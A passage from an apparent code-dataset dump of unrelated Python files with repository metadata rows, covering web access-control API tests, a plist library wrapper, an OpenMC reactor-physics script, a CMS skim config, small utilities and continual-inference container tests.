                     {'path' : '/foo/../bar'})
    self.assertEqual(400, resp.status_code)
    self.assertRegexpMatches(resp.content,
                             'Path should be absolute and normalized')
def test_add_existing_location(self):
    """Creating the same location twice is rejected with 400."""
    self.add_location()
    resp = self.post('/wwwhisper/admin/api/locations/',
                     {'path' : TEST_LOCATION})
    self.assertEqual(400, resp.status_code)
    self.assertRegexpMatches(resp.content, 'Location already exists')
def test_delete_location_twice(self):
    """The second DELETE of the same location fails with 404."""
    location_url = self.add_location()['self']
    self.assertEqual(204, self.delete(location_url).status_code)
    second = self.delete(location_url)
    self.assertEqual(404, second.status_code)
    self.assertRegexpMatches(second.content, 'Location not found')
def test_locations_limit(self):
    """Creating more locations than Site.locations_limit fails with 400."""
    limit = 7
    Site.locations_limit = limit
    locations_api = '/wwwhisper/admin/api/locations/'
    # The first `limit` locations are accepted...
    for i in range(limit):
        response = self.post(locations_api,
                             {'path' : '%s%d' % (TEST_LOCATION, i)})
        self.assertEqual(201, response.status_code)
    # ...one more is rejected.
    response = self.post(locations_api,
                         {'path' : '%s%d' % (TEST_LOCATION, limit)})
    self.assertEqual(400, response.status_code)
    self.assertRegexpMatches(response.content, 'Locations limit exceeded')
class AccessControlTest(AdminViewTestCase):
    """Tests for the per-location allowed-users API."""

    def can_access(self, location_url, user_uuid):
        """Return True iff the user is on the location's allowed list."""
        response = self.get(location_url + 'allowed-users/' + user_uuid + '/')
        self.assertTrue(response.status_code == 200
                        or response.status_code == 404)
        return response.status_code == 200

    def test_grant_access(self):
        """PUT creates the allowed-user resource and echoes user details."""
        location_url = self.add_location()['self']
        user = self.add_user()
        user_url, user_urn = user['self'], user['id']
        user_uuid = extract_uuid(user_urn)
        response = self.put(location_url + 'allowed-users/' + user_uuid + '/')
        self.assertEqual(201, response.status_code)
        body = json.loads(response.content)
        resource_url = location_url + 'allowed-users/' + user_uuid + '/'
        self.assertEqual(resource_url, response['Location'])
        self.assertFalse(response.has_header('Content-Location'))
        self.assertEqual(resource_url, body['self'])
        self.assertEqual(user_url, body['user']['self'])
        self.assertEqual(user_urn, body['user']['id'])
        self.assertEqual(TEST_USER_EMAIL, body['user']['email'])

    def test_grant_access_creates_allowed_user_resource(self):
        """Access is denied before the grant and allowed afterwards."""
        location_url = self.add_location()['self']
        user_uuid = extract_uuid(self.add_user()['id'])
        self.assertFalse(self.can_access(location_url, user_uuid))
        self.put(location_url + 'allowed-users/' + user_uuid + "/")
        self.assertTrue(self.can_access(location_url, user_uuid))

    def test_revoke_access(self):
        """DELETE removes a previously granted permission."""
        location_url = self.add_location()['self']
        user_uuid = extract_uuid(self.add_user()['id'])
        # Allow access.
        self.put(location_url + 'allowed-users/' + user_uuid + "/")
        self.assertTrue(self.can_access(location_url, user_uuid))
        # Revoke access.
        response = self.delete(
            location_url + 'allowed-users/' + user_uuid + "/")
        self.assertEqual(204, response.status_code)
        self.assertFalse(self.can_access(location_url, user_uuid))

    def test_location_lists_allowed_users(self):
        """The location resource lists every user that was granted access."""
        location_url = self.add_location()['self']
        # Create two users and allow both.
        user1_urn = self.add_user('user1@acme.com')['id']
        user2_urn = self.add_user('user2@acme.com')['id']
        for urn in (user1_urn, user2_urn):
            self.put(location_url + 'allowed-users/' + extract_uuid(urn) + "/")
        body = json.loads(self.get(location_url).content)
        allowed_users = body['allowedUsers']
        self.assertEqual(2, len(allowed_users))
        self.assertItemsEqual(['user1@acme.com', 'user2@acme.com'],
                              [item['email'] for item in allowed_users])
        self.assertItemsEqual([user1_urn, user2_urn],
                              [item['id'] for item in allowed_users])

    def test_grant_access_to_not_existing_location(self):
        """Granting access on an unknown location UUID fails with 404."""
        location_url = '/wwwhisper/admin/api/locations/%s/' % FAKE_UUID
        user_uuid = extract_uuid(self.add_user()['id'])
        response = self.put(location_url + 'allowed-users/' + user_uuid + '/')
        self.assertEqual(404, response.status_code)
        self.assertRegexpMatches(response.content, 'Location not found')

    def test_grant_access_for_not_existing_user(self):
        """Granting access for an unknown user UUID fails with 404."""
        location_url = self.add_location()['self']
        response = self.put(
            location_url + 'allowed-users/' + FAKE_UUID + '/')
        self.assertEqual(404, response.status_code)
        self.assertRegexpMatches(response.content, 'User not found')

    # PUT should be indempontent, granting access for the second time
    # should not return an error.
    def test_grant_access_twice(self):
        location_url = self.add_location()['self']
        user_uuid = extract_uuid(self.add_user()['id'])
        first = self.put(location_url + 'allowed-users/' + user_uuid + "/")
        self.assertEqual(201, first.status_code)
        self.assertTrue(first.has_header('Location'))
        second = self.put(location_url + 'allowed-users/' + user_uuid + "/")
        self.assertEqual(200, second.status_code)
        self.assertFalse(second.has_header('Location'))
        self.assertEqual(first.content, second.content)

    def test_revoke_access_twice(self):
        """The second revocation fails with 404 and access stays revoked."""
        location_url = self.add_location()['self']
        user_uuid = extract_uuid(self.add_user()['id'])
        # Allow access.
        self.put(location_url + 'allowed-users/' + user_uuid + "/")
        self.assertTrue(self.can_access(location_url, user_uuid))
        # Revoke access.
        response = self.delete(
            location_url + 'allowed-users/' + user_uuid + "/")
        self.assertEqual(204, response.status_code)
        response = self.delete(
            location_url + 'allowed-users/' + user_uuid + "/")
        self.assertEqual(404, response.status_code)
        self.assertRegexpMatches(response.content,
                                 'User can not access location.')
        self.assertFalse(self.can_access(location_url, user_uuid))
class AliasTest(AdminViewTestCase):
    """Tests for the site alias API."""

    def test_add_alias(self):
        """POST creates an alias and returns its canonical URLs."""
        response = self.post('/wwwhisper/admin/api/aliases/',
                             {'url' : TEST_ALIAS})
        self.assertEqual(201, response.status_code)
        body = json.loads(response.content)
        alias_uuid = extract_uuid(body['id'])
        self.assertRegexpMatches(body['id'], '^urn:uuid:%s$' % uid_regexp())
        self.assertEqual(TEST_ALIAS, body['url'])
        self_url = '{0}/wwwhisper/admin/api/aliases/{1}/'.format(
            TEST_SITE, alias_uuid)
        self.assertEqual(self_url, body['self'])
        self.assertEqual(self_url, response['Location'])
        self.assertEqual(self_url, response['Content-Location'])

    def test_get_alias(self):
        """GET returns exactly the representation produced by POST."""
        created = self.add_alias()
        get_response = self.get(created['self'])
        self.assertEqual(200, get_response.status_code)
        self.assertEqual(created, json.loads(get_response.content))

    def test_delete_alias(self):
        """A deleted alias answers 204 on DELETE and 404 afterwards."""
        alias_url = self.add_alias()['self']
        self.assertEqual(204, self.delete(alias_url).status_code)
        self.assertEqual(404, self.get(alias_url).status_code)

    def test_get_aliases_list(self):
        """The collection lists the created aliases plus the original one."""
        for url in ('http://foo.org', 'http://bar.org'):
            response = self.post('/wwwhisper/admin/api/aliases/',
                                 {'url' : url})
            self.assertEqual(201, response.status_code)
        response = self.get('/wwwhisper/admin/api/aliases/')
        self.assertEqual(200, response.status_code)
        body = json.loads(response.content)
        self.assertEqual('%s/wwwhisper/admin/api/aliases/' % TEST_SITE,
                         body['self'])
        aliases = body['aliases']
        # Two created aliases + the original one.
        self.assertEqual(3, len(aliases))
        self.assertItemsEqual(['http://foo.org', 'http://bar.org',
                               'https://foo.example.org:8080'],
                              [item['url'] for item in aliases])
class SkinTest(AdminViewTestCase):
    """Tests for the login-page skin API."""

    def test_get_skin(self):
        """GET returns the default skin settings."""
        response = self.get('/wwwhisper/admin/api/skin/')
        self.assertEqual(200, response.status_code)
        skin = json.loads(response.content)
        self.assertEqual('wwwhisper: Web Access Control', skin['title'])
        self.assertEqual('Protected site', skin['header'])
        self.assertRegexpMatches(skin['message'], 'Access to this site is')
        self.assertTrue(skin['branding'])

    def test_put_skin(self):
        """PUT updates every skin field and echoes the new values."""
        response = self.put('/wwwhisper/admin/api/skin/',
                            {'title': 'xyz',
                             'header': 'foo',
                             'message': 'bar',
                             'branding': False})
        self.assertEqual(200, response.status_code)
        skin = json.loads(response.content)
        self.assertEqual('xyz', skin['title'])
        self.assertEqual('foo', skin['header'])
        # Bug fix: arguments were swapped; the signature is (text, regexp),
        # matching the usage in test_get_skin above.
        self.assertRegexpMatches(skin['message'], 'bar')
        self.assertFalse(skin['branding'])

    def test_put_invalid_skin(self):
        """Oversized or empty fields are rejected with 400."""
        response = self.put('/wwwhisper/admin/api/skin/',
                            {'title': 'xyz' * 1000,
                             'header': '',
                             'message': '',
                             'branding': False})
        self.assertEqual(400, response.status_code)
        self.assertRegexpMatches(response.content,
                                 'Failed to update login page')
| 44.036437 | 80 | 0.635699 |
abe6448fcecf9dc6bfc75f1868f21902baa70a7a | 2,139 | py | Python | text_plistlib/plistlib.py | Artoria2e5/text-plistlib | 5f8c868341bc7e933c8c6e2587dbd75ad0dc93b0 | [
"MIT"
] | null | null | null | text_plistlib/plistlib.py | Artoria2e5/text-plistlib | 5f8c868341bc7e933c8c6e2587dbd75ad0dc93b0 | [
"MIT"
] | null | null | null | text_plistlib/plistlib.py | Artoria2e5/text-plistlib | 5f8c868341bc7e933c8c6e2587dbd75ad0dc93b0 | [
"MIT"
] | null | null | null | """
Wrapper providing a plistlib interface. Better than a patch?
"""
__all__ = [
    "InvalidFileException",
    "FMT_XML",
    "FMT_BINARY",
    "FMT_TEXT",
    "load",
    "dump",
    "loads",
    "dumps",
    "UID",
]

import plistlib as pl
from enum import Enum
from io import BytesIO
from typing import BinaryIO

from .impl import FMT_TEXT_HANDLER, TextPlistTypes

# Re-export the stdlib names untouched.
UID = pl.UID
InvalidFileException = pl.InvalidFileException

# Functional enum with FMT_XML / FMT_BINARY / FMT_TEXT members; injecting
# the members into the module globals mirrors plistlib's flat constants.
PF = Enum("TextPlistFormat", "FMT_XML FMT_BINARY FMT_TEXT", module=__name__)
globals().update(PF.__members__)

# Map our enum onto the stdlib's format constants (text is handled locally).
translation = {
    PF.FMT_XML: pl.FMT_XML,
    PF.FMT_BINARY: pl.FMT_BINARY,
}
def load(fp: BinaryIO, *, fmt=None, **kwargs) -> TextPlistTypes:
    """Read a .plist from the binary file object *fp*.

    With ``fmt=None`` the text format is sniffed from the first bytes;
    otherwise the stdlib's own XML/binary auto-detection takes over.
    """
    if fmt is None:
        # Sniff the header to detect the text format, then rewind.
        header = fp.read(32)
        fp.seek(0)
        if FMT_TEXT_HANDLER["detect"](header):
            fmt = PF.FMT_TEXT
    if fmt == PF.FMT_TEXT:
        return FMT_TEXT_HANDLER["parser"](**kwargs).parse(fp)
    else:
        # Bug fix: `translation[fmt]` raised KeyError when fmt stayed None
        # (a non-text plist with no explicit format). `.get` forwards None
        # so plistlib auto-detects XML/binary, consistent with `dump`.
        # This one can fail a bit more violently like the original
        return pl.load(fp, fmt=translation.get(fmt), **kwargs)
def loads(value: bytes, **kwargs) -> TextPlistTypes:
    """
    Read a .plist file from a bytes object.

    >>> loads(b'{4=1;}', fmt=FMT_TEXT)
    {'4': '1'}
    """
    buffer = BytesIO(value)
    return load(buffer, **kwargs)
def dump(value: TextPlistTypes, fp, *, fmt=PF.FMT_TEXT, **kwargs):
    """Serialize *value* to the binary file object *fp* in format *fmt*."""
    if fmt != PF.FMT_TEXT:
        # ignore type -- let the real plistlib complain about None :)
        return pl.dump(value, fp, fmt=translation.get(fmt), **kwargs)  # type: ignore
    FMT_TEXT_HANDLER["writer"](fp, **kwargs).write(value)
def dumps(value: TextPlistTypes, **kwargs) -> bytes:
    r"""
    Serialize *value* and return the plist as bytes.

    The docstring is raw so the doctest's ``\n``/``\t`` escapes stay
    literal and match ``bytes.__repr__`` (a non-raw docstring turned them
    into real newlines/tabs, breaking the doctest).

    >>> dumps({ "1": [2,3,4,None,5] })
    b'{\n\t"1" = (\n\t\t<*I2>,\n\t\t<*I3>,\n\t\t<*I4>,\n\t\t"",\n\t\t<*I5>,\n\t);\n}'
    """
    fp = BytesIO()
    dump(value, fp, **kwargs)
    return fp.getvalue()
if __name__ == "__main__":
    import sys

    # Manual smoke test: evaluate a Python literal from argv and dump it.
    # NOTE: eval on CLI input is acceptable only for this dev-time helper.
    if len(sys.argv) > 1:
        print(dumps(eval(sys.argv[1])))
| 25.771084 | 86 | 0.586255 |
abe683c77717a86c75c2669b78ad1d9d8749390b | 3,992 | py | Python | treat/moc/kinf/make_kinf.py | tjlaboss/tasty_treat | 5a137b49c6648eda6500025de8bab9c8dcc78d45 | [
"MIT"
] | 3 | 2019-03-04T22:52:07.000Z | 2022-01-23T12:28:58.000Z | treat/moc/kinf/make_kinf.py | tjlaboss/tasty_treat | 5a137b49c6648eda6500025de8bab9c8dcc78d45 | [
"MIT"
] | 3 | 2021-07-23T17:30:35.000Z | 2021-09-17T16:25:57.000Z | treat/moc/kinf/make_kinf.py | tjlaboss/tasty_treat | 5a137b49c6648eda6500025de8bab9c8dcc78d45 | [
"MIT"
] | null | null | null | # Make kinf
#
# Analyze the fuel materials from different libraries
import numpy as np
import openmc
from openmc import mgxs
import os
import sys; sys.path.append("..")
import materials
import energy_groups
def _get_fuel(library):
    """Return the fuel material, falling back to the '7.6 ppm' variant."""
    try:
        return library.get_material("fuel")
    except KeyError:
        return library.get_material("fuel 7.6 ppm")
def get_geometry(fuel):
    """Build a 20x20x20 cm box filled with `fuel`.

    Periodic boundaries on all six faces emulate an infinite medium
    (k-infinity calculation).
    """
    root_cell = openmc.Cell(name="root cell")
    root_cell.fill = fuel
    xmin = openmc.XPlane(x0=-10, boundary_type="periodic")
    xmax = openmc.XPlane(x0=+10, boundary_type="periodic")
    ymin = openmc.YPlane(y0=-10, boundary_type="periodic")
    ymax = openmc.YPlane(y0=+10, boundary_type="periodic")
    zmin = openmc.ZPlane(z0=-10, boundary_type="periodic")
    zmax = openmc.ZPlane(z0=+10, boundary_type="periodic")
    root_cell.region = +xmin & -xmax & +ymin & -ymax & +zmin & -zmax
    root_universe = openmc.Universe(0, "root universe", [root_cell])
    geometry = openmc.Geometry()
    geometry.root_universe = root_universe
    return geometry
def get_materials(library):
    """Convert the material library to an openmc.Materials collection."""
    return library.toOpenmcMaterials()
def get_settings():
    """Monte Carlo run settings: 1e6 particles, 100 batches (25 inactive)."""
    settings = openmc.Settings()
    settings.particles = int(1E6)
    settings.batches = 100
    settings.inactive = 25
    return settings
def _mgxs_groups(groups, geom, fuel, by_nuclide=False):
    """Build one mgxs.Library per requested group structure.

    Returns a dict mapping group count -> built mgxs.Library over the
    fuel material domain.
    """
    libraries = {}
    for num_groups in groups:
        assert num_groups in energy_groups.ALL_GROUP_NUMBERS
        # The 11-group structure is TREAT-specific; the rest are CASMO's.
        if num_groups == 11:
            eg = energy_groups.treat["11-group"]
        else:
            eg = energy_groups.casmo["{}-group".format(num_groups)]
        # Scale the group edges by 1e6 (presumably MeV -> eV — confirm).
        eg.group_edges *= 1E6
        lib = mgxs.Library(geom)
        lib.energy_groups = eg
        lib.mgxs_types = ['nu-transport', 'transport', 'total', 'fission',
                          'nu-fission', 'capture', 'chi', 'consistent nu-scatter matrix']
        lib.correction = "P0"
        lib.by_nuclide = by_nuclide
        lib.domain_type = "material"
        lib.domains = [fuel]
        lib.build_library()
        libraries[num_groups] = lib
    return libraries
def get_tallies(fuel, libraries=None):
    """Create tallies: per-nuclide absorption plus any MGXS library tallies."""
    tallies = openmc.Tallies()
    absorption = openmc.Tally()
    absorption.scores = ["absorption"]
    # First column of fuel.nuclides holds the nuclide names.
    absorption.nuclides = list(np.array(fuel.nuclides)[:, 0])
    tallies.extend([absorption])
    if libraries is not None:
        for lib in libraries.values():
            lib.add_to_tallies_file(tallies)
    return tallies
def export_to_xml(export_path, s, g, m, t=None, l=None):
    """Write settings (s), geometry (g), materials (m) and optionally
    tallies (t) and MGXS libraries (l) to XML under `export_path`."""
    assert isinstance(s, openmc.Settings)
    assert isinstance(g, openmc.Geometry)
    assert isinstance(m, openmc.Materials)
    if t is not None:
        assert isinstance(t, openmc.Tallies)
        t.export_to_xml(export_path + "/tallies.xml")
    if l is not None:
        for lib in l.values():
            lib.dump_to_file("material_lib_{}".format(lib.num_groups),
                             directory=export_path)
    s.export_to_xml(export_path + "/settings.xml")
    g.export_to_xml(export_path + "/geometry.xml")
    m.export_to_xml(export_path + "/materials.xml")
def build_model(lib, multigroup):
    """Build and export the infinite-medium model for material library `lib`
    with MGXS libraries for each group structure in `multigroup`."""
    matlib = materials.get_library(lib)
    if not os.path.isdir(lib):
        # Standard PermissionError is exactly what we want
        os.mkdir(lib)
    print("Exporting to:", lib)
    fuel = _get_fuel(matlib)
    # Expand natural elements into individual nuclides.
    # Note: I think this can be done with "fuel.get_nuclide_densities()"
    for element_spec in fuel.elements[:]:
        elem, etype, efrac = element_spec[0:3]
        for nuc, nfrac, ntype in elem.expand(etype, efrac):
            fuel.add_nuclide(nuc, nfrac, ntype)
        fuel.remove_element(elem)
    mats = get_materials(matlib)
    sets = get_settings()
    geom = get_geometry(fuel)
    libs = _mgxs_groups(multigroup, geom, fuel)
    tals = get_tallies(fuel, libs)
    export_to_xml(lib, sets, geom, mats, tals, libs)
    # Extract and save the nuclide number densities / fractions.
    fuel_atoms = fuel.get_nuclide_atom_densities()
    nuclide_results = np.array(list(fuel_atoms.values()))
    nuclides = np.array([n.name for n in nuclide_results[:, 0]])
    np.savetxt(lib + "/nuclides.txt", nuclides, fmt='%s')
    atom_dens = nuclide_results[:, 1]
    np.savetxt(lib + "/atom_dens.txt", atom_dens)
    np.savetxt(lib + "/atom_frac.txt", atom_dens / atom_dens.sum())
if __name__ == "__main__":
    # Default run: BATMAN library with 11- and 25-group MGXS structures.
    build_model("BATMAN", multigroup=[11, 25])
| 29.352941 | 75 | 0.717435 |
abe704d6ccddf0e4852958c0661a8661be5aca37 | 1,775 | py | Python | Configuration/Skimming/test/tier1_hi/hiHighPt_PromptSkim2011_cfg.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | Configuration/Skimming/test/tier1_hi/hiHighPt_PromptSkim2011_cfg.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | Configuration/Skimming/test/tier1_hi/hiHighPt_PromptSkim2011_cfg.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
process = cms.Process("HIGHPTSKIM")
process.load('Configuration.StandardSequences.Services_cff')
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load('Configuration.EventContent.EventContentHeavyIons_cff')
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(
'file:/mnt/hadoop/cms/store/hidata/HIRun2010/HIAllPhysics/RECO/SDmaker_3SD_1CS_PDHIAllPhysicsZSv2_SD_JetHI-v1/0000/A8934EC1-904B-E011-862C-003048F17528.root'
)
)
# =============== Other Statements =====================
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(-1))
process.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))
#Trigger Selection
### Comment out for the timing being assuming running on secondary dataset with trigger bit selected already
import HLTrigger.HLTfilters.hltHighLevel_cfi
process.hltHIHighPt = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()
process.hltHIHighPt.HLTPaths = ['HLT_HIDoublePhoton15_*','HLT_HIJet80_*','HLT_HISinglePhoton40_*'] # for allphysics
process.hltHIHighPt.andOr = cms.bool(True)
process.hltHIHighPt.throw = cms.bool(False)
process.eventFilter_step = cms.Path( process.hltHIHighPt )
process.output = cms.OutputModule("PoolOutputModule",
outputCommands = process.RECOEventContent.outputCommands,
fileName = cms.untracked.string('hiHighPt.root'),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('eventFilter_step')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RECO'),
filterName = cms.untracked.string('hiHighPt'))
)
process.output_step = cms.EndPath(process.output)
process.schedule = cms.Schedule(
process.eventFilter_step,
process.output_step
)
| 41.27907 | 165 | 0.774085 |
abe9baf8318a46fc0311d26e659c7ccdb9f8b58b | 162 | py | Python | util/time.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 4 | 2016-12-17T20:06:10.000Z | 2021-11-19T04:45:29.000Z | util/time.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 11 | 2021-01-06T05:35:11.000Z | 2022-03-11T23:28:31.000Z | util/time.py | thorwhalen/ut | 353a4629c35a2cca76ef91a4d5209afe766433b4 | [
"MIT"
] | 3 | 2015-06-12T10:44:16.000Z | 2021-07-26T18:39:47.000Z | from warnings import warn
# Emit a proper deprecation warning: DeprecationWarning is the standard
# category for "module moved" notices (stacklevel=2 points at the importer).
warn('Deprecated: Moved to ut.util.utime (to avoid name conflict with standard lib `time`)',
     DeprecationWarning, stacklevel=2)

from ut.util.utime import *  # move here
| 27 | 92 | 0.746914 |
abea45b584c7c99d2b9324078e8fed24a7f61377 | 369 | py | Python | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | lepoop/entry/not_configured.py | alvinwan/lepoop | a611a4334941527077b1f772d1ac0ae008daedc0 | [
"MIT"
] | null | null | null | """Runs when the `poop` alias has not been setup."""
from colorama import init

from ..utils import colored
from .alias import is_configured
from .alias import configure

# Enable ANSI colour handling (needed for coloured output on Windows).
init()
def main():
    """Configure the `poop` alias on first run and tell the user to reload."""
    if is_configured():
        return
    configure()
    print(colored('The `poop` alias was configured successfully.\n'
                  'Run `source ~/.bashrc` or restart your shell.'))
| 21.705882 | 67 | 0.682927 |
abed9d35fcc34be316a0a17409f3f6ae90788595 | 443 | py | Python | src/biking/migrations/0002_auto_20170312_1532.py | AlexDevelop/seen-movies | 95d83d3271258feb5c55544de1078f467c569bc5 | [
"MIT"
] | null | null | null | src/biking/migrations/0002_auto_20170312_1532.py | AlexDevelop/seen-movies | 95d83d3271258feb5c55544de1078f467c569bc5 | [
"MIT"
] | null | null | null | src/biking/migrations/0002_auto_20170312_1532.py | AlexDevelop/seen-movies | 95d83d3271258feb5c55544de1078f467c569bc5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-12 15:32
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Make BikeRide.ride_avg_km nullable.

    dependencies = [
        ('biking', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='bikeride',
            name='ride_avg_km',
            field=models.FloatField(null=True),
        ),
    ]
| 21.095238 | 48 | 0.609481 |
abedb7b5e1c8f300b4bf64a7a429b96267ce296d | 210 | py | Python | coding/learn_python/function_object/reduce_mul_demo.py | yatao91/learning_road | e88dc43de98e35922bfc71c222ec71766851e618 | [
"MIT"
] | 3 | 2021-05-25T16:58:52.000Z | 2022-02-05T09:37:17.000Z | coding/learn_python/function_object/reduce_mul_demo.py | yataosu/learning_road | e88dc43de98e35922bfc71c222ec71766851e618 | [
"MIT"
] | null | null | null | coding/learn_python/function_object/reduce_mul_demo.py | yataosu/learning_road | e88dc43de98e35922bfc71c222ec71766851e618 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
from functools import reduce
from operator import mul
def fact_lambda(n):
    """Return n! via reduce with an inline lambda.

    The initializer 1 makes fact_lambda(0) == 1 (the mathematical 0!)
    instead of raising TypeError on the empty range.
    """
    return reduce(lambda a, b: a * b, range(1, n + 1), 1)
def fact_mul(n):
    """Return n! via reduce with operator.mul (0! == 1 via the initializer)."""
    return reduce(mul, range(1, n + 1), 1)
| 17.5 | 52 | 0.647619 |
abf5a5efa1eec3c81e55b4c7175e48f263de13b1 | 16,929 | py | Python | tests/continual/test_container.py | LukasHedegaard/continual-inference | 99a01f1360c56e2578231edd8fecb0dbadbf44d0 | [
"Apache-2.0"
] | 7 | 2021-09-22T14:42:59.000Z | 2022-03-28T20:43:25.000Z | tests/continual/test_container.py | LukasHedegaard/continual-inference | 99a01f1360c56e2578231edd8fecb0dbadbf44d0 | [
"Apache-2.0"
] | 29 | 2021-08-11T06:58:21.000Z | 2022-03-29T07:19:37.000Z | tests/continual/test_container.py | LukasHedegaard/continual-inference | 99a01f1360c56e2578231edd8fecb0dbadbf44d0 | [
"Apache-2.0"
] | 2 | 2021-10-03T20:03:09.000Z | 2021-12-03T17:31:48.000Z | import math
from collections import OrderedDict
import pytest
import torch
from torch import nn
import continual as co
from continual.module import TensorPlaceholder
torch.manual_seed(42)
def test_sequential():
    """co.Sequential built from nn.Sequential matches forward/steps/step."""
    S = 3
    clip = torch.normal(mean=torch.zeros(10 * 3 * 3)).reshape((1, 1, 10, 3, 3))
    seq = nn.Sequential(
        nn.Conv3d(in_channels=1, out_channels=1, kernel_size=(5, S, S),
                  bias=True, padding=(0, 1, 1), padding_mode="zeros"),
        nn.Conv3d(in_channels=1, out_channels=1, kernel_size=(3, S, S),
                  bias=True, padding=(0, 1, 1), padding_mode="zeros"),
        nn.MaxPool3d(kernel_size=(1, 2, 2)),
    )

    coseq = co.Sequential.build_from(seq)
    # Temporal delay is the sum of the (kernel - 1) terms.
    assert coseq.delay == (5 - 1) + (3 - 1)

    # forward: clip-wise outputs agree.
    target = seq.forward(clip)
    assert torch.allclose(coseq.forward(clip), target)

    # forward_steps on all but the last frame (update_state=False first).
    firsts_no_update = coseq.forward_steps(clip[:, :, :-1], update_state=False)
    firsts = coseq.forward_steps(clip[:, :, :-1])
    assert torch.allclose(firsts, firsts_no_update)
    assert torch.allclose(firsts, target[:, :, :-1])

    # forward_step on the final frame continues from the saved state.
    last_no_update = coseq.forward_step(clip[:, :, -1], update_state=False)
    last = coseq.forward_step(clip[:, :, -1])
    assert torch.allclose(last, last_no_update)
    assert torch.allclose(last, target[:, :, -1])

    # Clean state can be used to restart seq computation.
    coseq.clean_state()
    assert torch.allclose(coseq.forward_steps(clip[:, :, :-1]),
                          target[:, :, :-1])
def test_sequential_receptive_field():
    """Receptive field, stride and padding compose through a Sequential."""
    sample = torch.randn((1, 1, 100))

    # No padding, stride 1: ten stacked k=9 convs.
    model = co.Sequential(*[co.Conv1d(1, 1, 9) for _ in range(10)])
    assert model.receptive_field == 9 + 8 * 9
    out = model.forward(sample)
    assert out.shape[2] == 100 - (model.receptive_field - 1)

    # "Same" padding, stride 1.
    model = co.Sequential(*[co.Conv1d(1, 1, 9, padding=4) for _ in range(10)])
    assert model.receptive_field == 9 + 8 * 9
    out = model.forward(sample)
    assert out.shape[2] == 100 - (model.receptive_field - 1) + 2 * model.padding

    # No padding, mixed strides.
    model = co.Sequential(
        co.Conv1d(1, 1, 3, padding=0, stride=1),
        co.Conv1d(1, 1, 3, padding=0, stride=2),
        co.Conv1d(1, 1, 3, padding=0, stride=3),
        co.Conv1d(1, 1, 3, padding=0, stride=1),
    )
    assert model.receptive_field == 21
    out = model.forward(sample)
    assert out.shape[2] == math.ceil(
        (100 - (model.receptive_field - 1)) / model.stride
    )

    # Padding, mixed strides.
    model = co.Sequential(
        co.Conv1d(1, 1, 3, padding=1, stride=1),
        co.Conv1d(1, 1, 3, padding=1, stride=2),
        co.Conv1d(1, 1, 3, padding=1, stride=3),
        co.Conv1d(1, 1, 3, padding=1, stride=1),
    )
    assert model.receptive_field == 21
    out = model.forward(sample)
    assert model.padding == 1 + 1 + 2 + 2 * 3
    assert out.shape[2] == math.ceil(
        (100 - (model.receptive_field - 1) + 2 * model.padding) / model.stride
    )
def test_sequential_with_TensorPlaceholder():
    """Strided sub-modules skip steps; placeholders mark skipped outputs."""
    sample = torch.arange(32, dtype=torch.float).reshape((1, 1, 32))
    seq = nn.Sequential(
        nn.Conv1d(in_channels=1, out_channels=1, kernel_size=3, bias=False,
                  padding=1, padding_mode="zeros"),
        nn.MaxPool1d(kernel_size=2, stride=2, padding=0),  # temporal skips
        nn.Conv1d(in_channels=1, out_channels=1, kernel_size=3, bias=False,
                  stride=2,  # temporal skips
                  padding=1, padding_mode="zeros"),
    )
    torch.nn.init.ones_(seq[0].weight)
    torch.nn.init.ones_(seq[2].weight)

    coseq = co.Sequential.build_from(seq)
    assert coseq.stride == 4
    assert coseq.padding == 3
    assert coseq.receptive_field == 8
    assert coseq.delay == 4

    target = seq.forward(sample)

    # forward_steps with end-padding reproduces the clip-wise result.
    assert torch.allclose(coseq.forward_steps(sample, pad_end=True), target)

    # Step-wise: non-tensor placeholders are dropped; without end-padding
    # the final output is missing.
    coseq.clean_state()
    stepwise = [
        coseq.forward_step(sample[:, :, t]) for t in range(sample.shape[2])
    ]
    collected = torch.stack(
        [o for o in stepwise if isinstance(o, torch.Tensor)], dim=2
    )
    assert torch.allclose(target[:, :, :-1], collected)
def test_sum_reduce():
    """reduce_sum adds the broadcast outputs elementwise."""
    ones = torch.ones((1, 2, 4, 3, 3))
    summed = co.container.reduce_sum([ones, ones])
    assert torch.allclose(summed, 2 * torch.ones((1, 2, 4, 3, 3)))
def test_concat_reduce():
    """reduce_concat stacks the inputs along the channel dimension (dim 1)."""
    ones = torch.ones((1, 2, 4, 3, 3))
    twos = 2 * torch.ones((1, 2, 4, 3, 3))
    cat = co.container.reduce_concat([ones, twos])
    assert cat.shape == (1, 4, 4, 3, 3)
    assert torch.allclose(cat[:, :2], ones)
    assert torch.allclose(cat[:, 2:], twos)
def test_residual():
    """co.Residual adds the identity to the wrapped conv's output."""
    x = torch.arange(6, dtype=torch.float).reshape((1, 1, 6))
    conv = nn.Conv1d(1, 1, kernel_size=3, padding=1, bias=False)
    torch.nn.init.ones_(conv.weight)
    co_conv = co.Conv1d.build_from(conv)
